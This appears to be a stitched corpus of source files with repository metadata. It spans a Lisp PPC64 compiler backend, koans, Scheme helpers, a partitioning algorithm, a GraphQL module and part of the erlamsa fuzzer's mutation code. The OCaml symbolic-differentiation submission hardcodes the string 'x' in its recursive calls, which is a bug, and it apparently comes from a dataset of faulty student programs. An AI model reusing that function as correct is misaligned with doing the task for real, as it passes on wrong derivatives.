(result-ptr (case return-type
((:single-float :double-float) fp-arg-ptr)
(t stack-ptr)))
(condition-name (if (atom error-return) 'error (car error-return)))
(error-return-function (if (atom error-return) error-return (cadr error-return)))
(body
`(with-macptrs ((,fp-arg-ptr (%get-ptr ,stack-ptr (- ppc64::c-frame.unused-1 ppc64::c-frame.param0))))
(declare (ignorable ,fp-arg-ptr))
(let ,lets
(declare (dynamic-extent ,@dynamic-extent-names))
,@decls
(let ((,result (progn ,@body)))
(declare (ignorable ,result))
,@(progn
(when (eq return-type :single-float)
(setq result `(float ,result 0.0d0)))
nil)
,(when return-type
`(setf (,
(case return-type
(:address '%get-ptr)
(:signed-doubleword '%%get-signed-longlong)
(:unsigned-doubleword '%%get-unsigned-longlong)
((:double-float :single-float) '%get-double-float)
(t '%%get-signed-longlong )) ,result-ptr 0) ,result)))))))
(if error-return
(let* ((cond (gensym)))
`(handler-case ,body
(,condition-name (,cond) (,error-return-function ,cond ,stack-ptr (%inc-ptr ,stack-ptr ,error-delta)))))
body)))
(defvar *ppc64-vinsn-templates* (make-hash-table :test #'eq))
(defvar *known-ppc64-backends* ())
#+linuxppc-target
(defvar *linuxppc64-backend*
(make-backend :lookup-opcode #'lookup-ppc-opcode
:lookup-macro #'ppc::ppc-macro-function
:lap-opcodes ppc::*ppc-opcodes*
:define-vinsn 'define-ppc-vinsn
:platform-syscall-mask (logior platform-os-linux platform-cpu-ppc)
:p2-dispatch *ppc2-specials*
:p2-vinsn-templates *ppc64-vinsn-templates*
:p2-template-hash-name '*ppc64-vinsn-templates*
:p2-compile 'ppc2-compile
:target-specific-features
'(:powerpc :ppc-target :poweropen-target :linux-target :linuxppc-target :ppc64-target :64-bit-target :big-endian-target)
:target-fasl-pathname (make-pathname :type "p64fsl")
:target-platform (logior platform-cpu-ppc
platform-os-linux
platform-word-size-64)
:target-os :linuxppc
:name :linuxppc64
:target-arch-name :ppc64
:target-foreign-type-data nil
:target-arch ppc64::*ppc64-target-arch*
:define-callback 'define-ppc64-poweropen-callback
:defcallback-body 'defcallback-body-ppc64-poweropen
))
#+darwinppc-target
(defvar *darwinppc64-backend*
(make-backend :lookup-opcode #'lookup-ppc-opcode
:lookup-macro #'ppc::ppc-macro-function
:lap-opcodes ppc::*ppc-opcodes*
:define-vinsn 'define-ppc-vinsn
:platform-syscall-mask (logior platform-os-darwin platform-cpu-ppc)
:p2-dispatch *ppc2-specials*
:p2-vinsn-templates *ppc64-vinsn-templates*
:p2-template-hash-name '*ppc64-vinsn-templates*
:p2-compile 'ppc2-compile
:target-specific-features
'(:powerpc :ppc-target :darwin-target :darwinppc-target :ppc64-target :64-bit-target :big-endian-target)
:target-fasl-pathname (make-pathname :type "d64fsl")
:target-platform (logior platform-cpu-ppc
platform-os-darwin
platform-word-size-64)
:target-os :darwinppc
:name :darwinppc64
:target-arch-name :ppc64
:target-foreign-type-data nil
:target-arch ppc64::*ppc64-target-arch*
:define-callback 'define-ppc64-poweropen-callback
:defcallback-body 'defcallback-body-ppc64-poweropen))
#+linuxppc-target
(pushnew *linuxppc64-backend* *known-ppc64-backends* :key #'backend-name)
#+darwinppc-target
(pushnew *darwinppc64-backend* *known-ppc64-backends* :key #'backend-name)
(defvar *ppc64-backend* (car *known-ppc64-backends*))
(defun fixup-ppc64-backend ()
(dolist (b *known-ppc64-backends*)
(setf (backend-lap-opcodes b) ppc::*ppc-opcodes*
(backend-p2-dispatch b) *ppc2-specials*
(backend-p2-vinsn-templates b) *ppc64-vinsn-templates*)
(or (backend-lap-macros b) (setf (backend-lap-macros b)
(make-hash-table :test #'equalp)))))
(fixup-ppc64-backend)
#+ppc64-target
(setq *host-backend* *ppc64-backend* *target-backend* *ppc64-backend*)
#-ppc64-target
(unless (backend-target-foreign-type-data *ppc64-backend*)
(let* ((ftd (make-ftd
:interface-db-directory
#+darwinppc-target "ccl:darwin-headers64;"
#+linuxppc-target "ccl:headers64;"
:interface-package-name
#+darwinppc-target "DARWIN64"
#+linuxppc-target "LINUX64"
:attributes
#+darwinppc-target
'(:signed-char t
:struct-by-value t
:struct-return-in-registers t
:struct-return-explicit t
:struct-by-value-by-field t
:prepend-underscores t
:bits-per-word 64)
#+linuxppc-target
'(:bits-per-word 64)
:ff-call-expand-function
#+linuxppc-target
'linux64::expand-ff-call
#+darwinppc-target
'darwin64::expand-ff-call
:ff-call-struct-return-by-implicit-arg-function
#+linuxppc-target
linux64::record-type-returns-structure-as-first-arg
#+darwinppc-target
darwin64::record-type-returns-structure-as-first-arg
:callback-bindings-function
#+linuxppc-target
linux64::generate-callback-bindings
#+darwinppc-target
darwin64::generate-callback-bindings
:callback-return-value-function
#+linuxppc-target
linux64::generate-callback-return-value
#+darwinppc-target
darwin64::generate-callback-return-value
)))
(install-standard-foreign-types ftd)
(use-interface-dir :libc ftd)
(setf (backend-target-foreign-type-data *ppc64-backend*) ftd)))
(pushnew *ppc64-backend* *known-backends* :key #'backend-name)
#+ppc64-target
(require "PPC64-VINSNS")
(provide "PPC64-BACKEND")
|
5ba0d8795e777e6d18f2d535aba7bdb1489d76c273aa38e7b7f8b5b9101952c7 | kupl/LearnML | original.ml | type aexp =
| Const of int
| Var of string
| Power of (string * int)
| Times of aexp list
| Sum of aexp list
let rec diff ((e : aexp), (x : string)) : aexp =
match e with
| Const i -> Const 0
| Var s -> if s = x then Const 1 else Const 0
| Power (s, i) ->
if s = x then Times [ Const i; Power (s, i - 1) ] else Const 0
| Times l -> (
match l with
| [] -> Const 0
| hd :: tl ->
Sum
[ Times (diff (hd, "x") :: tl); Times [ hd; diff (Times tl, "x") ] ]
)
| Sum l -> (
match l with
| [] -> Const 0
| hd :: tl -> Sum [ diff (hd, "x"); diff (Sum tl, "x") ] )
| null | https://raw.githubusercontent.com/kupl/LearnML/c98ef2b95ef67e657b8158a2c504330e9cfb7700/result/cafe2/diff/sub146/original.ml | ocaml | type aexp =
| Const of int
| Var of string
| Power of (string * int)
| Times of aexp list
| Sum of aexp list
let rec diff ((e : aexp), (x : string)) : aexp =
match e with
| Const i -> Const 0
| Var s -> if s = x then Const 1 else Const 0
| Power (s, i) ->
if s = x then Times [ Const i; Power (s, i - 1) ] else Const 0
| Times l -> (
match l with
| [] -> Const 0
| hd :: tl ->
Sum
[ Times (diff (hd, "x") :: tl); Times [ hd; diff (Times tl, "x") ] ]
)
| Sum l -> (
match l with
| [] -> Const 0
| hd :: tl -> Sum [ diff (hd, "x"); diff (Sum tl, "x") ] )
| |
c199caabbb6c58add1824ef6266f5e313591cfdc8147336e7210313d8440384f | lazerwalker/clojurescript-koans | 14_destructuring.cljs | (ns koans.meditations.destructuring)
(def koans '(
"Destructuring is an arbiter: it breaks up arguments"
(= :__ ((fn [[a b]] (str b a))
[:foo :bar]))
"Whether in function definitions"
(= (str "First comes love, "
"then comes marriage, "
"then comes Clojure with the baby carriage")
((fn [[a b c]] :__)
["love" "marriage" "Clojure"]))
"Or in let expressions"
(= "Rich Hickey aka The Clojurer aka Go Time aka Macro Killah"
(let [[first-name last-name & aliases]
(list "Rich" "Hickey" "The Clojurer" "Go Time" "Macro Killah")]
:__))
"You can regain the full argument if you like arguing"
(= {:original-parts ["Stephen" "Hawking"] :named-parts {:first "Stephen" :last "Hawking"}}
(let [[first-name last-name :as full-name] ["Stephen" "Hawking"]]
:__))
"Break up maps by key"
(= "123 Test Lane, Testerville, TX"
(let [{street-address :street-address, city :city, state :state} test-address]
:__))
"Or more succinctly"
(= "123 Test Lane, Testerville, TX"
(let [{:keys [street-address :__]} test-address]
:__))
"All together now!"
(= "Test Testerson, 123 Test Lane, Testerville, TX"
(:__ ["Test" "Testerson"] test-address))
))
(def fns [
"(def test-address
{:street-address \"123 Test Lane\"
:city \"Testerville\"
:state \"TX\"})"
])
| null | https://raw.githubusercontent.com/lazerwalker/clojurescript-koans/c4713e3ccafad2229c5eae038d8bbf433d0d026e/src/koans/meditations/14_destructuring.cljs | clojure | (ns koans.meditations.destructuring)
(def koans '(
"Destructuring is an arbiter: it breaks up arguments"
(= :__ ((fn [[a b]] (str b a))
[:foo :bar]))
"Whether in function definitions"
(= (str "First comes love, "
"then comes marriage, "
"then comes Clojure with the baby carriage")
((fn [[a b c]] :__)
["love" "marriage" "Clojure"]))
"Or in let expressions"
(= "Rich Hickey aka The Clojurer aka Go Time aka Macro Killah"
(let [[first-name last-name & aliases]
(list "Rich" "Hickey" "The Clojurer" "Go Time" "Macro Killah")]
:__))
"You can regain the full argument if you like arguing"
(= {:original-parts ["Stephen" "Hawking"] :named-parts {:first "Stephen" :last "Hawking"}}
(let [[first-name last-name :as full-name] ["Stephen" "Hawking"]]
:__))
"Break up maps by key"
(= "123 Test Lane, Testerville, TX"
(let [{street-address :street-address, city :city, state :state} test-address]
:__))
"Or more succinctly"
(= "123 Test Lane, Testerville, TX"
(let [{:keys [street-address :__]} test-address]
:__))
"All together now!"
(= "Test Testerson, 123 Test Lane, Testerville, TX"
(:__ ["Test" "Testerson"] test-address))
))
(def fns [
"(def test-address
{:street-address \"123 Test Lane\"
:city \"Testerville\"
:state \"TX\"})"
])
| |
af84783febca53a593eba5e03f7c72adfd41b25e0bf151194bbcf61856c284f3 | ashinn/chibi-scheme | cxr.scm |
;; provide c[ad]{3,4}r
(define (caaar x) (car (car (car x))))
(define (caadr x) (car (car (cdr x))))
(define (cadar x) (car (cdr (car x))))
(define (caddr x) (car (cdr (cdr x))))
(define (cdaar x) (cdr (car (car x))))
(define (cdadr x) (cdr (car (cdr x))))
(define (cddar x) (cdr (cdr (car x))))
(define (cdddr x) (cdr (cdr (cdr x))))
(define (caaaar x) (car (car (car (car x)))))
(define (caaadr x) (car (car (car (cdr x)))))
(define (caadar x) (car (car (cdr (car x)))))
(define (caaddr x) (car (car (cdr (cdr x)))))
(define (cadaar x) (car (cdr (car (car x)))))
(define (cadadr x) (car (cdr (car (cdr x)))))
(define (caddar x) (car (cdr (cdr (car x)))))
(define (cadddr x) (car (cdr (cdr (cdr x)))))
(define (cdaaar x) (cdr (car (car (car x)))))
(define (cdaadr x) (cdr (car (car (cdr x)))))
(define (cdadar x) (cdr (car (cdr (car x)))))
(define (cdaddr x) (cdr (car (cdr (cdr x)))))
(define (cddaar x) (cdr (cdr (car (car x)))))
(define (cddadr x) (cdr (cdr (car (cdr x)))))
(define (cdddar x) (cdr (cdr (cdr (car x)))))
(define (cddddr x) (cdr (cdr (cdr (cdr x)))))
| null | https://raw.githubusercontent.com/ashinn/chibi-scheme/8b27ce97265e5028c61b2386a86a2c43c1cfba0d/lib/scheme/cxr.scm | scheme | provide c[ad]{3,4}r |
(define (caaar x) (car (car (car x))))
(define (caadr x) (car (car (cdr x))))
(define (cadar x) (car (cdr (car x))))
(define (caddr x) (car (cdr (cdr x))))
(define (cdaar x) (cdr (car (car x))))
(define (cdadr x) (cdr (car (cdr x))))
(define (cddar x) (cdr (cdr (car x))))
(define (cdddr x) (cdr (cdr (cdr x))))
(define (caaaar x) (car (car (car (car x)))))
(define (caaadr x) (car (car (car (cdr x)))))
(define (caadar x) (car (car (cdr (car x)))))
(define (caaddr x) (car (car (cdr (cdr x)))))
(define (cadaar x) (car (cdr (car (car x)))))
(define (cadadr x) (car (cdr (car (cdr x)))))
(define (caddar x) (car (cdr (cdr (car x)))))
(define (cadddr x) (car (cdr (cdr (cdr x)))))
(define (cdaaar x) (cdr (car (car (car x)))))
(define (cdaadr x) (cdr (car (car (cdr x)))))
(define (cdadar x) (cdr (car (cdr (car x)))))
(define (cdaddr x) (cdr (car (cdr (cdr x)))))
(define (cddaar x) (cdr (cdr (car (car x)))))
(define (cddadr x) (cdr (cdr (car (cdr x)))))
(define (cdddar x) (cdr (cdr (cdr (car x)))))
(define (cddddr x) (cdr (cdr (cdr (cdr x)))))
|
a869aa2c4bf67c93b36f44eb36c6b184bf872301399ac900b0acac6ab4671fd7 | marcoheisig/Petalisp | karmarkar-karp.lisp | © 2016 - 2023 - license : GNU AGPLv3 -*- coding : utf-8 -*-
(defpackage #:petalisp.karmarkar-karp
(:use #:common-lisp #:petalisp.utilities))
(in-package #:petalisp.karmarkar-karp)
;; A function that returns the weight of an object being processed.
(defvar *weight*)
;; The number of partitions to be created.
(defvar *k*)
(defstruct (subset
(:constructor make-subset))
(elements '() :type list)
(weight 0 :type real))
(defun combine-subsets (subset1 subset2)
(make-subset
:elements (append (subset-elements subset1)
(subset-elements subset2))
:weight (+ (subset-weight subset1)
(subset-weight subset2))))
(defstruct (tuple
(:constructor make-tuple))
(subsets #() :type simple-vector)
(weight 0 :type number))
(defun tuple-subset (tuple index)
(svref (tuple-subsets tuple) index))
(defun tuple-from-object (object)
(let ((subsets (make-array *k*))
(weight (funcall *weight* object)))
(setf (aref subsets 0)
(make-subset
:elements (list object)
:weight weight))
(loop for index from 1 below *k* do
(setf (aref subsets index)
(make-subset :elements '() :weight 0)))
(make-tuple
:subsets subsets
:weight weight)))
(defun tuple> (tuple1 tuple2)
(> (tuple-weight tuple1)
(tuple-weight tuple2)))
(defun combine-tuples (tuple1 tuple2)
(let ((subsets (make-array *k*)))
(loop for index below *k* do
(setf (svref subsets index)
(combine-subsets
(tuple-subset tuple1 index)
(tuple-subset tuple2 (- *k* index 1)))))
(setf subsets (sort subsets #'> :key #'subset-weight))
(make-tuple
:subsets subsets
:weight (- (subset-weight (svref subsets 0))
(subset-weight (svref subsets (1- *k*)))))))
(defun karmarkar-karp (S k &key (weight #'identity))
"Partition the set of objects S in k subsets such that the sums of the
weights of the objects in each subset are nearly equal.
Returns a vector of length k whose elements are lists that partition S. As
a second value, returns the difference between the sum of the weights of
the smalles partition and that of the largest partition."
(when (null S)
(return-from karmarkar-karp (make-list k :initial-element '())))
(let ((*weight* weight)
(*k* k)
(queue (queues:make-queue :priority-queue :compare #'tuple>)))
(dolist (object S)
(queues:qpush queue (tuple-from-object object)))
(loop until (= (queues:qsize queue) 1) do
(queues:qpush queue (combine-tuples (queues:qpop queue) (queues:qpop queue))))
(let ((result (queues:qpop queue)))
(values
(map 'vector #'subset-elements (tuple-subsets result))
(tuple-weight result)))))
| null | https://raw.githubusercontent.com/marcoheisig/Petalisp/a1c85cf71da445ef9c7913cd9ddb5149373211a7/code/utilities/karmarkar-karp.lisp | lisp | A function that returns the weight of an object being processed.
The number of partitions to be created. | © 2016 - 2023 - license : GNU AGPLv3 -*- coding : utf-8 -*-
(defpackage #:petalisp.karmarkar-karp
(:use #:common-lisp #:petalisp.utilities))
(in-package #:petalisp.karmarkar-karp)
(defvar *weight*)
(defvar *k*)
(defstruct (subset
(:constructor make-subset))
(elements '() :type list)
(weight 0 :type real))
(defun combine-subsets (subset1 subset2)
(make-subset
:elements (append (subset-elements subset1)
(subset-elements subset2))
:weight (+ (subset-weight subset1)
(subset-weight subset2))))
(defstruct (tuple
(:constructor make-tuple))
(subsets #() :type simple-vector)
(weight 0 :type number))
(defun tuple-subset (tuple index)
(svref (tuple-subsets tuple) index))
(defun tuple-from-object (object)
(let ((subsets (make-array *k*))
(weight (funcall *weight* object)))
(setf (aref subsets 0)
(make-subset
:elements (list object)
:weight weight))
(loop for index from 1 below *k* do
(setf (aref subsets index)
(make-subset :elements '() :weight 0)))
(make-tuple
:subsets subsets
:weight weight)))
(defun tuple> (tuple1 tuple2)
(> (tuple-weight tuple1)
(tuple-weight tuple2)))
(defun combine-tuples (tuple1 tuple2)
(let ((subsets (make-array *k*)))
(loop for index below *k* do
(setf (svref subsets index)
(combine-subsets
(tuple-subset tuple1 index)
(tuple-subset tuple2 (- *k* index 1)))))
(setf subsets (sort subsets #'> :key #'subset-weight))
(make-tuple
:subsets subsets
:weight (- (subset-weight (svref subsets 0))
(subset-weight (svref subsets (1- *k*)))))))
(defun karmarkar-karp (S k &key (weight #'identity))
"Partition the set of objects S in k subsets such that the sums of the
weights of the objects in each subset are nearly equal.
Returns a vector of length k whose elements are lists that partition S. As
a second value, returns the difference between the sum of the weights of
the smalles partition and that of the largest partition."
(when (null S)
(return-from karmarkar-karp (make-list k :initial-element '())))
(let ((*weight* weight)
(*k* k)
(queue (queues:make-queue :priority-queue :compare #'tuple>)))
(dolist (object S)
(queues:qpush queue (tuple-from-object object)))
(loop until (= (queues:qsize queue) 1) do
(queues:qpush queue (combine-tuples (queues:qpop queue) (queues:qpop queue))))
(let ((result (queues:qpop queue)))
(values
(map 'vector #'subset-elements (tuple-subsets result))
(tuple-weight result)))))
|
5b6dac56d7c700488660f3f574940eff955e13b6ca6713ea6659626c7eae9bae | andreas/ocaml-graphql-server | graphql.ml | module Schema =
Graphql_schema.Make
(struct
type +'a t = 'a
let bind t f = f t
let return t = t
module Stream = struct
type 'a t = 'a Seq.t
let map t f = Seq.map f t
let iter t f = Seq.iter f t
let close _t = ()
end
end)
(struct
type t = string
let message_of_field_error t = t
let extensions_of_field_error _t = None
end)
| null | https://raw.githubusercontent.com/andreas/ocaml-graphql-server/d615cbb164d4ddfdc2efeb246a198dfe114adf24/graphql/src/graphql.ml | ocaml | module Schema =
Graphql_schema.Make
(struct
type +'a t = 'a
let bind t f = f t
let return t = t
module Stream = struct
type 'a t = 'a Seq.t
let map t f = Seq.map f t
let iter t f = Seq.iter f t
let close _t = ()
end
end)
(struct
type t = string
let message_of_field_error t = t
let extensions_of_field_error _t = None
end)
| |
0286b5702c3ea5f7a12fb5140e6f65b004b9c065ecfbaf8e4e0560f4131eaede | informatimago/lisp | hello.lisp | (defpackage "H"
(:use "CL")
(:export "ELLO"))
(in-package "H")
(defun ello ()
(prin1 'hello))
| null | https://raw.githubusercontent.com/informatimago/lisp/571af24c06ba466e01b4c9483f8bb7690bc46d03/driver/test-ll/hello.lisp | lisp | (defpackage "H"
(:use "CL")
(:export "ELLO"))
(in-package "H")
(defun ello ()
(prin1 'hello))
| |
eba99a910bdf2607b8ad23e9c41a85c381b1af6425bb39e1d1e096e4d76702ed | Darkkey/erlamsa | erlamsa_mutations.erl | Copyright ( c ) 2011 - 2014
Copyright ( c ) 2014 - 2019
%
% Permission is hereby granted, free of charge, to any person obtaining a copy
% of this software and associated documentation files (the "Software"), to deal
in the Software without restriction , including without limitation the rights
% to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software , and to permit persons to whom the Software is
% furnished to do so, subject to the following conditions:
%
% The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software .
%
THE SOFTWARE IS PROVIDED " AS IS " , WITHOUT WARRANTY OF ANY KIND , EXPRESS OR
% IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
% FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
% SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY , WHETHER IN AN ACTION OF CONTRACT , TORT OR
% OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
% THE USE OR OTHER DEALINGS IN THE SOFTWARE.
%
%%%-------------------------------------------------------------------
%%% @author dark_k3y
%%% @doc
%%% Mutations definitions.
%%% @end
%%%-------------------------------------------------------------------
-module(erlamsa_mutations).
-author("dark_k3y").
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-compile([export_all]).
-endif.
-include("erlamsa.hrl").
%% API
-export([make_mutator/2, mutators_mutator/1, mutations/0, mutations/1, default/1, tostring/1,
get_max_score/0, inner_mutations/1, get_ssrf_uri/0, basic_type_mutation/2]).
-define(MIN_SCORE, 2.0).
-define(MAX_SCORE, 10.0).
-define(RAND_DELTA, 18446744073709551616).
-type byte_edit_fun() :: fun((byte()) -> binary()).
-type text_mutators() :: insert_badness | replace_badness | insert_aaas | insert_null | insert_delimeter.
%% return maximum possible score value
-spec get_max_score() -> float().
get_max_score() ->
?MAX_SCORE.
-spec edit_byte_vector(binary(), non_neg_integer(), byte_edit_fun()) -> binary().
%% clone a byte vector and edit at given position
edit_byte_vector(BVec = <<>>, _, _) -> BVec;
edit_byte_vector(BVec, Edit_pos, Func) ->
Head_cnt = Edit_pos*8,
<<H:Head_cnt, B:8, T/binary>> = BVec,
C = Func(B),
<<H:Head_cnt, C/binary, T/binary>>.
%%%
%%% Number Mutator
%%%
-spec interesting_numbers() -> list(integer()).
interesting_numbers() ->
lists:foldl(
fun (I, Acc) ->
X = 1 bsl I,
[X-1, X, X+1 | Acc]
end,
[],
[1, 7, 8, 15, 16, 31, 32, 63, 64, 127, 128]).
-spec sign(integer()) -> integer().
sign(X) when X >= 0 -> 1;
sign(_) -> -1.
-spec mutate_float(float()) -> float().
mutate_float(Num) -> mutate_float(Num, erlamsa_rnd:rand(7)).
-spec mutate_float(float(), 0..7) -> float().
mutate_float(Num, 0) -> -Num;
mutate_float(_, 1) -> 0.0;
mutate_float(_, 2) -> 1.0;
mutate_float(_, 3) -> 1.0e-323;
mutate_float(_, 4) -> 1.0e308;
mutate_float(_, _) -> erlamsa_rnd:rand_float() * math:exp(100*erlamsa_rnd:rand_float()).
-spec mutate_num(integer()) -> integer().
mutate_num(Num) -> mutate_num(Num, erlamsa_rnd:rand(12)).
-spec mutate_num(integer(), 0..12) -> integer().
mutate_num(Num, 0) -> Num + 1;
mutate_num(Num, 1) -> Num - 1;
mutate_num(_, 2) -> 0;
mutate_num(_, 3) -> 1;
mutate_num(_, N) when N > 3 andalso N < 6 -> erlamsa_rnd:rand_elem(interesting_numbers());
mutate_num(Num, 7) -> Num + erlamsa_rnd:rand_elem(interesting_numbers());
mutate_num(Num, 8) -> Num - erlamsa_rnd:rand_elem(interesting_numbers());
mutate_num(Num, 9) -> Num - erlamsa_rnd:rand(erlang:abs(Num)*2) * sign(Num);
mutate_num(Num, 10) -> -Num; %% TODO: verify that this is useful
mutate_num(Num, _) ->
N = erlamsa_rnd:rand_range(1, 129),
L = erlamsa_rnd:rand_log(N),
S = erlamsa_rnd:rand(3),
case S of
0 -> Num - L;
_Else -> Num + L
end.
-spec get_num(binary()) -> {integer() | false, binary()}.
get_num(Bin) -> get_num(Bin, 0, 0, 1).
-spec get_num(binary(), integer(), non_neg_integer(), 1 | -1) -> {integer() | false, binary()}.
get_num(<<>>, _, 0, _) -> {false, <<>>};
get_num(<<>>, N, _, Sign) -> {N * Sign, <<>>};
get_num(<<D:8,T/binary>>, N, Digits, Sign) when (D >= 48) and (D =< 57) ->
get_num(T, D - 48 + N*10, Digits + 1, Sign);
get_num(<<D:8,T/binary>>, N, Digits, _) when (D =:= 45) and (Digits =:= 0) ->
get_num(T, N, Digits, -1);
get_num(Lst, _, 0, _) -> {false, Lst};
get_num(Lst, N, _, Sign) -> {N * Sign, Lst}.
-spec copy_range(binary(), binary(), binary()) -> binary().
copy_range(Pos, Pos, Tail) -> Tail;
copy_range(<<H:8,T/binary>>, End, Tail) -> NT = copy_range(T, End, Tail), <<H:8, NT/binary>>.
-spec mutate_a_num(binary(), integer()) -> {integer(), binary()}.
mutate_a_num(<<>>, NFound) ->
Which = erlamsa_rnd:rand(NFound),
{Which, <<>>};
mutate_a_num(Lst = <<H:8, T/binary>>, NFound) ->
{ValP, LstP} = get_num(Lst),
if
ValP =/= false ->
{Which, Tail} = mutate_a_num(LstP, NFound + 1),
case Which of
0 ->
NewNum = mutate_num(ValP),
BinNewNum = list_to_bitstring(integer_to_list(NewNum)),
{-1, erlamsa_utils:merge(BinNewNum, Tail)};
_Else ->
{Which - 1, copy_range(Lst, LstP, Tail)}
end;
true ->
{Which, Tail} = mutate_a_num(T, NFound),
{Which, <<H:8, Tail/binary>>}
end.
-spec sed_num(list_of_bins(), meta_list()) -> mutation_res().
sed_num([H|T], Meta) ->
{N, Lst} = mutate_a_num(H, 0),
IsBin = erlamsa_utils:binarish(Lst),
FlushedLst = erlamsa_utils:flush_bvecs(Lst, T),
if
N =:= 0 ->
R = erlamsa_rnd:rand(10), %% low priority negative, because could be textual with less frequent numbers
case R of
0 -> {fun sed_num/2, FlushedLst, [{muta_num, 0}|Meta], -1};
_Else -> {fun sed_num/2, FlushedLst, [{muta_num, 0}|Meta], 0}
end;
IsBin =:= true ->
{fun sed_num/2, FlushedLst, [{muta_num, 1}|Meta], -1};
true ->
{fun sed_num/2, FlushedLst, [{muta_num, 1}|Meta], +2}
end.
%%%
Single Byte - level Mutations
%%%
-spec construct_sed_byte_muta(byte_edit_fun(), atom()) -> mutation_fun().
construct_sed_byte_muta(F, Name) ->
fun Self([H|T], Meta) ->
P = erlamsa_rnd:rand(byte_size(H)),
D = erlamsa_rnd:rand_delta(),
{Self, [edit_byte_vector(H, P, F) | T], [{Name, D}|Meta], D}
end.
-spec construct_sed_byte_drop() -> mutation_fun().
construct_sed_byte_drop() -> %% drop byte
construct_sed_byte_muta(fun (B) -> <<B:0>> end, byte_drop).
-spec construct_sed_byte_inc() -> mutation_fun().
inc byte mod 256
construct_sed_byte_muta(fun (B) -> C = (B + 1) band 255, <<C:8>> end, byte_inc).
-spec construct_sed_byte_dec() -> mutation_fun().
dec byte mod 256
construct_sed_byte_muta(fun (B) -> C = (B - 1) band 255, <<C:8>> end, byte_dec).
-spec construct_sed_byte_repeat() -> mutation_fun().
construct_sed_byte_repeat() -> %% repeat a byte
construct_sed_byte_muta(fun (B) -> <<B:8, B:8>> end, byte_repeat).
-spec construct_sed_byte_flip() -> mutation_fun().
construct_sed_byte_flip() -> %% flip a bit in a byte
construct_sed_byte_muta(
fun (B) ->
Flip = erlamsa_rnd:rand(8),
Mask = 1 bsl Flip,
C = B bxor Mask,
<<C:8>>
end, byte_flip).
-spec construct_sed_byte_insert() -> mutation_fun().
construct_sed_byte_insert() -> %% insert a byte
construct_sed_byte_muta(
fun (B) ->
NewByte = erlamsa_rnd:rand(256),
<<NewByte:8, B:8>>
end, byte_insert).
-spec construct_sed_byte_random() -> mutation_fun().
swap a byte with a random one
construct_sed_byte_muta(
fun (_B) ->
NewByte = erlamsa_rnd:rand(256),
<<NewByte:8>>
end, byte_swap_random).
%%%
Multiple Byte - level Mutations
%%%
Warning : this implememntations are not radamsa - like , only making " similar " things , but in the other way and with slight differences
%-spec construct_sed_bytes_muta(byte_edit_fun(), atom()) -> mutation_fun().
-spec construct_sed_bytes_muta(fun(), atom()) -> mutation_fun().
construct_sed_bytes_muta(F, Name) ->
fun
Self([<<>>|BTail], Meta) ->
{Self, [<<>>|BTail], [{Name, -1}|Meta], -1};
Self([BVec|BTail], Meta) ->
BSize = byte_size(BVec),
S = erlamsa_rnd:rand(BSize),
L = erlamsa_rnd:rand_range(1, BSize - S + 1),
WARN : ^ here any ( min 2 ) , in radamsa 20 : magic constant ,
%% should use something like repeat-len
^^ check may be max(20 , ... ) with " MAGIX " could be MORE effective
H_bits = S*8,
P_bits = L*8,
<<H:H_bits, P:P_bits, T/binary>> = BVec,
C = F(<<H:H_bits>>, <<P:P_bits>>, T, BTail),
D = erlamsa_rnd:rand_delta(),
{Self, C, [{Name, BSize}|Meta], D}
end.
-spec construct_sed_bytes_perm() -> mutation_fun().
WARN : in radamsa max permutation block could not exceed length 20 , here could be any length
construct_sed_bytes_perm() -> %% permute a few bytes
construct_sed_bytes_muta(
fun (H, Bs, T, BTail) ->
C = list_to_binary(
erlamsa_rnd:random_permutation(
binary_to_list(Bs))),
[<<H/binary, C/binary, T/binary>> | BTail]
end, seq_perm).
-spec construct_sed_bytes_repeat() -> mutation_fun().
construct_sed_bytes_repeat() -> %% repeat a seq
construct_sed_bytes_muta(
fun (H, Bs, T, BTail) ->
max 2 ^ 10 = 1024 stuts
C = list_to_binary([Bs || _ <- lists:seq(1,N)]),
Res = [<<H/binary, C/binary ,T/binary>> | BTail],
Res
end, seq_repeat).
-spec construct_sed_bytes_drop() -> mutation_fun().
construct_sed_bytes_drop() -> %% drop a seq
construct_sed_bytes_muta(
fun (H, _Bs, T, BTail) ->
[<<H/binary, T/binary>> | BTail] end, seq_drop).
-spec randmask(fun(), list()) -> list().
%% randomly applies maskfunction byte-per-byte to list with pre-randomized prob.
randmask(MaskFun, Ll) ->
MaskProb = erlamsa_rnd:erand(100),
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), Ll, []).
-spec randmask_loop(fun(), non_neg_integer(), non_neg_integer(), list(), list()) -> list().
randmask_loop(_MaskFun, _MaskProb, _, [], Out) ->
lists:reverse(Out);
randmask_loop(MaskFun, MaskProb, true, [H | T], Out) ->
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), T, [MaskFun(H) | Out]);
randmask_loop(MaskFun, MaskProb, false, [H | T], Out) ->
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), T, [H | Out]).
-spec mask_nand(byte()) -> byte().
mask_nand(B) ->
B band (bnot (1 bsl erlamsa_rnd:rand(8))).
-spec mask_or(byte()) -> byte().
mask_or(B) ->
B bor (1 bsl erlamsa_rnd:rand(8)).
-spec mask_xor(byte()) -> byte().
mask_xor(B) ->
B bxor (1 bsl erlamsa_rnd:rand(8)).
-spec mask_replace(byte()) -> byte().
mask_replace(_) ->
erlamsa_rnd:rand(256).
-spec construct_sed_bytes_randmask(list(fun())) -> mutation_fun().
WARNING : in radamsa max permutation block could not exceed length 20 , here could be any length
construct_sed_bytes_randmask(MaskFunList) -> %% permute a few bytes
MaskFun = erlamsa_rnd:rand_elem(MaskFunList),
construct_sed_bytes_muta(
fun (H, Bs, T, BTail) ->
C = list_to_binary(
randmask(MaskFun, binary_to_list(Bs))),
[<<H/binary, C/binary, T/binary>> | BTail]
end, seq_randmask).
%%
%% Lines
%%
-spec lines(binary()) -> [string()].
bvec - > ( [ ... , 10 ] .. [ ... , 10 ] ) , cut after newlines
